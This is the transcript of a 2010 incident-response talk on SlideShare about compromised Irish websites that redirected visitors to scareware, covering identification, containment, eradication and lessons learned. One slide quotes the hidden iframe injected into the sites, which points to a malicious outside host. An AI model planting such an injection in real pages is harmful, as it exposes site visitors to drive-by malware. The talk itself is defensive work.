Your SlideShare is downloading. ×
Scareware Traversing the World via Ireland
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Scareware Traversing the World via Ireland

649

Published on

As a volunteer handler for IrissCert, I was notified of several Irish websites being compromised and containing malicious code. The presentation covers the investigation and incident handling process …

As a volunteer handler for IrissCert, I was notified of several Irish websites being compromised and containing malicious code. The presentation covers the investigation and incident handling process followed.

Published in: Technology, News & Politics
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
649
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
0
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Scareware Traversing the World via an Irish Web Exploit Mark Hillick (@markofu) IrissCert Incident HandlerFriday 17 September 2010
  • 2. Presentations 99%Friday 17 September 2010
  • 3. IrelandFriday 17 September 2010
  • 4. Ireland CSIRT/CERT?Friday 17 September 2010
  • 5. EuropeFriday 17 September 2010
  • 6. Introducing IRISS Volunteer handlers Local Security Professionals Weekly handler shifts Not-for-profit organizationFriday 17 September 2010
  • 7. What do we see?Friday 17 September 2010
  • 8. How do users feel? 2/3 have been victims < 10% feel very safe 97% expect to be victims Law Enforcement & Businesses lack resourcesFriday 17 September 2010
  • 9. Why we’re here!Friday 17 September 2010
  • 10. ALERTS IRISS customFriday 17 September 2010
  • 11. ScarewareFriday 17 September 2010
  • 12. $$$$ FBI -> $150 millionFriday 17 September 2010
  • 13. How easy? Very :-(Friday 17 September 2010
  • 14. GrowthFriday 17 September 2010
  • 15. Scareware EvolvingFriday 17 September 2010
  • 16. Remember Zen and the art of incident handling ...Friday 17 September 2010
  • 17. ReactionsFriday 17 September 2010
  • 18. ReactionsFriday 17 September 2010
  • 19. ReactionsFriday 17 September 2010
  • 20. Identification Gather information Analysis DetermineFriday 17 September 2010
  • 21. Identification - Vector Legitimate WebsitesFriday 17 September 2010
  • 22. Identification - WA Not visible iframe injection • <iframe frameborder = 0 height = 2 width = 2 src ="http://jobstopfil.biz/ tds_a/go.php/go.php?id=4" /></body>Friday 17 September 2010
  • 23. Identification - iframeFriday 17 September 2010
  • 24. Identification - WA DNS requests HTTP • Gets • Posts ScriptsFriday 17 September 2010
  • 25. Identification - SWFriday 17 September 2010
  • 26. Identification SWFriday 17 September 2010
  • 27. Identification - SWFriday 17 September 2010
  • 28. Identification - SWFriday 17 September 2010
  • 29. Identification - Analysis Exploited Sites hosted on one server Weak FTP passwords (e.g. Ghost61) Two most popular web site attacks – • Gumblar - PHP Sites • Asprox - SQL InjectionFriday 17 September 2010
  • 30. Containment Verify Stop the Spread • Remove • Notify • Inform Blackhole Source: Profound Whatever - Flickr Creative CommonsFriday 17 September 2010
  • 31. Eradication Remove Improve Vulnerability Analysis RestoreFriday 17 September 2010
  • 32. Eradication - How?Friday 17 September 2010
  • 33. Eradication - Hosting Struggle but...Friday 17 September 2010
  • 34. Recovery Source: Dilbert ©2009, United Feature Syndicate, Inc.Friday 17 September 2010
  • 35. Recovery - Be Sure! Validate, Restore & MonitorFriday 17 September 2010
  • 36. Lessons LearnedFriday 17 September 2010
  • 37. Lessons Learned Things required for an IR plan - • IR Team • Contact List • Regular Reviews • Escalation ProcessFriday 17 September 2010
  • 38. Lessons Learned Awareness Back-up & test the restore ;-) Patch Test website for vulnerabilities & exploits Defence-in-depth Free Local & Online tools for safer browsing& analysisFriday 17 September 2010
  • 39. Lessons Learned “A website must be able to protect itself from a hostile browser and a browser must be able to protect itself from a hostile website” Jeremiah Grossman (Feb. 2010)Friday 17 September 2010
  • 40. Lessons Learned - Prep Fail to Prepare, well you know the rest :)Friday 17 September 2010
  • 41. Scareware Evolution source: http:// www.f-secure.comFriday 17 September 2010
  • 42. What do you use?Friday 17 September 2010
  • 43. go raibh mile maith agat Twitter @markofu @irisscert @hackeire #irisscon Google-Fu “scareware site:sans.org” Unless states, source of images -> Flickr Creative Commons, iStockPhoto or my own!!Friday 17 September 2010
  • 44. Well......Friday 17 September 2010

×